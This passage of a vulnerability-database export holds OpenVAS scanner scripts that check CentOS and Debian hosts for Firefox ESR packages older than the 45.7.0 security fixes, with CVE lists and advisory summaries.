value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~45.7.0~1.el7.centos\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:25", "bulletinFamily": "scanner", "description": "Check the version of firefox", "modified": "2019-03-08T00:00:00", "published": "2017-01-27T00:00:00", "id": "OPENVAS:1361412562310882642", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882642", "title": "CentOS Update for firefox CESA-2017:0190 centos6", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for firefox CESA-2017:0190 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882642\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-27 05:42:01 +0100 (Fri, 27 Jan 2017)\");\n script_cve_id(\"CVE-2017-5373\", \"CVE-2017-5375\", \"CVE-2017-5376\", \"CVE-2017-5378\",\n \"CVE-2017-5380\", \"CVE-2017-5383\", \"CVE-2017-5386\", \"CVE-2017-5390\",\n \"CVE-2017-5396\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for firefox CESA-2017:0190 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of firefox\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mozilla Firefox is an open source web browser.\n\nThis update upgrades Firefox to version 45.7.0 ESR.\n\nSecurity Fix(es):\n\n * Multiple flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nFirefox. (CVE-2017-5373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378,\nCVE-2017-5380, CVE-2017-5383, CVE-2017-5386, CVE-2017-5390, CVE-2017-5396)\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Jann Horn, Muneaki Nishimura, Nils, Armin Razmjou,\nChristian Holler, Gary Kwong, Andre Bargull, Jan de Mooij, Tom Schuster,\nand Oriol, Rh0, Nicolas Gregoire, and Jerri Rice as the original reporters.\");\n script_tag(name:\"affected\", value:\"firefox on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:0190\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-January/022256.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~45.7.0~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:38", "bulletinFamily": "scanner", "description": "Multiple security issues have been found\nin the Mozilla Firefox web browser: Memory safety errors, use-after-frees and other\nimplementation errors may lead to the execution of arbitrary code, information\ndisclosure or privilege escalation.", "modified": "2019-03-18T00:00:00", "published": "2017-01-25T00:00:00", "id": "OPENVAS:1361412562310703771", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703771", "title": "Debian Security Advisory DSA 3771-1 (firefox-esr - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3771.nasl 14280 2019-03-18 14:50:45Z cfischer $\n# Auto-generated from advisory DSA 3771-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703771\");\n script_version(\"$Revision: 14280 $\");\n script_cve_id(\"CVE-2017-5373\", \"CVE-2017-5375\", \"CVE-2017-5376\", \"CVE-2017-5378\",\n \"CVE-2017-5380\", \"CVE-2017-5383\", \"CVE-2017-5386\", \"CVE-2017-5390\",\n \"CVE-2017-5396\");\n script_name(\"Debian Security Advisory DSA 3771-1 (firefox-esr - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:50:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-25 00:00:00 +0100 (Wed, 25 Jan 2017)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3771.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"firefox-esr on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthese problems have been fixed in version 45.7.0esr-1~deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 45.7.0esr-1 of firefox-esr and version 51.0-1 of firefox.\n\nWe recommend that you upgrade your firefox-esr packages.\");\n script_tag(name:\"summary\", value:\"Multiple security issues have been found\nin the Mozilla Firefox web browser: Memory safety errors, use-after-frees and other\nimplementation errors may lead to the execution of arbitrary code, information\ndisclosure or privilege escalation.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"firefox-esr\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-dbg\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-dev\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ach\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-af\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-all\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-an\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ar\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-as\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ast\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-az\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-be\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-bg\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn-bd\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn-in\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-br\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-bs\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ca\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-cs\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-cy\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-da\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-de\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-dsb\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-el\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-gb\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-za\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-eo\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-ar\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-cl\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-es\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-mx\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-et\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-eu\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-fa\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ff\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-fi\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-fr\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-fy-nl\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ga-ie\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-gd\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-gl\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-gn\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-gu-in\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-he\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-hi-in\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-hr\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-hsb\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-hu\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-hy-am\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-id\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-is\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-it\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ja\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-kk\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-km\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-kn\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ko\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-lij\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-lt\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-lv\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-mai\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-mk\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ml\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-mr\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ms\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-nb-no\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-nl\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-nn-no\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-or\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-pa-in\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-pl\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-br\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-pt\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-rm\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ro\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ru\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-si\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-sk\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-sl\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-son\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-sq\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-sr\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-sv-se\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ta\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-te\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-th\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-tr\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-uk\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-uz\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-vi\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-xh\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-cn\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-tw\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-dbg\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-dev\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ach\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-af\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-all\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-an\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ar\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-as\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ast\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-az\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-be\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-bg\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-bd\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-in\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-br\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-bs\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ca\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-cs\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-cy\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-da\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-de\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-dsb\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-el\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-en-gb\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-en-za\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-eo\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-es-ar\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-es-cl\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-es-es\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-es-mx\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-et\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = 